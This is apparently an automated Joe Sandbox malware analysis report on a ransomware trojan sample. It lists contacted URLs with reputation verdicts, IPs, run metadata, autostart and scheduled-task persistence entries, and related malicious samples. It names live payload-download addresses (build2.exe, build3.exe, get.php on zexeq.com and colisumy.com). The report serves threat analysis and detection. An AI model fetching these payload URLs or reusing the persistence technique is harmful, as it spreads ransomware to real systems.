00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://api.2ip.ua/geo.json%baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001166000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.twitter.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935241959.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                http://www.openssl.org/support/faq.htmlbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exefalse
                                  high
                                  https://www.google.combaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.2ip.ua/geo.jsongCbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errorbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exefalse
                                      • Avira URL Cloud: safe
                                      low
                                      https://api.2ip.ua/geo.jsonsbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://we.tl/t-tnzomMj6baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmptrue
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://api.2ip.ua/obaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.reddit.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935177752.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://api.2ip.ua/geo.jsonsSbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 16%, Virustotal, Browse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.nytimes.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935112454.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://api.2ip.ua/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.2ip.ua/dbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.2ip.ua/geo.jsonUbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.2ip.ua/geo.jsonOCbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://colisumy.com/dl/build2.exebaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • URL Reputation: malware
                                                        unknown
                                                        http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Vbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://api.2ip.ua/Pbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://we.tl/t-tnzomMj6KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://api.2ip.ua/geo.jsongbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637ibaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://api.2ip.ua/=baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://zexeq.com/raud/get.phpepbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • URL Reputation: malware
                                                              unknown
                                                              https://api.2ip.ua/geo.json:baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.youtube.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935388771.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://zexeq.com/files/1/build3.exerun8baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • 17%, Virustotal, Browse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://api.2ip.ua/geo.jsonMbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.wikipedia.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935312916.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.2ip.ua/geo.jsonObaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://we.tl/t-tnzomMj6HUbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.live.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935045851.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.2ip.ua/:baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.google.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934984061.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            199.59.242.150
                                                                            zexeq.comUnited States
                                                                            395082BODIS-NJUStrue
                                                                            104.21.65.24
                                                                            api.2ip.uaUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            Joe Sandbox version:39.0.0 Ruby
                                                                            Analysis ID:1381448
                                                                            Start date and time:2024-01-26 01:35:05 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 13s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:11
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.rans.troj.evad.winEXE@9/1154@3/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 99%
                                                                            • Number of executed functions: 111
                                                                            • Number of non-executed functions: 216
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadFile calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                            TimeTypeDescription
                                                                            00:35:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
                                                                            00:35:58Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe s>--Task
                                                                            00:36:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
                                                                            01:36:19API Interceptor1x Sleep call for process: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            199.59.242.1506279e6237524c32988e7128c27a6a44c301ac1d1531ab3abf317b064eba76acd_payload.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • potunulit.org/
                                                                            Ymdtavpqygjrzq_PI.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                            • www.agritamaperkasaindonesia.com/kmge/
                                                                            Ibyz5QzGiV.exeGet hashmaliciousLokibotBrowse
                                                                            • steevya.com/admin/ba/five/fre.php
                                                                            Factura proforma adjunta.exeGet hashmaliciousFormBookBrowse
                                                                            • www.yakin-hm.com/nt8e/?Yxo=MZHud9kMxet5T2L8YDs3rsYyxIdNjupHhQJnT0keEq5jiDIySj744ig25LCroVWDpjT4&jR-Xjh=5jHPk
                                                                            K.exeGet hashmaliciousFormBookBrowse
                                                                            • www.cetiya-veluvana.com/t75f/?u0=Tl4nDa252FMQpJVNY72qWpuVEFp510CZfqovHxMA7fYk3klFuQo16toWEHSGxtFJGw2O&m4=Wbfx
                                                                            0001.exeGet hashmaliciousFormBookBrowse
                                                                            • www.gardzet6.site/rht6/?1bbh=2duHZ8O0&w84PKtm=PA2P7p+1xflJkDULrkdSh717KSKlfthlFefPs9yUelGMDGkwpVE1Edn1X8mpjUbZRLAM
                                                                            USsJ0oRIYr.docxGet hashmaliciousUnknownBrowse
                                                                            • updatingnewofficefilefromcloud.mangospot.net/win/document.doc
                                                                            104.21.65.24toolspub1.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                              toolspub1(1).exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                file.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                  toolspub1.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog StealerBrowse
                                                                                    nMQ8ZsQ2j1.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                      toolspub1.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                        file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                          DiFp5gEj5Z.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                            toolspub2.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                              file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                zexeq.com3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 175.119.10.231
                                                                                                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 175.120.254.9
                                                                                                UpS8Qm873s.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 175.120.254.9
                                                                                                g0Zq7nJjus.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 196.188.169.138
                                                                                                E0tabE4K4r.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 109.175.29.39
                                                                                                sbvN2ih5AU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 175.120.254.9
                                                                                                kOVwcHSfrR.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 186.182.55.44
                                                                                                file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 180.94.156.61
                                                                                                file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 211.119.84.111
                                                                                                buildz.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 186.13.17.220
                                                                                                api.2ip.uatoolspub1.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                                • 104.21.65.24
                                                                                                file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                toolspub1(1).exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                                • 104.21.65.24
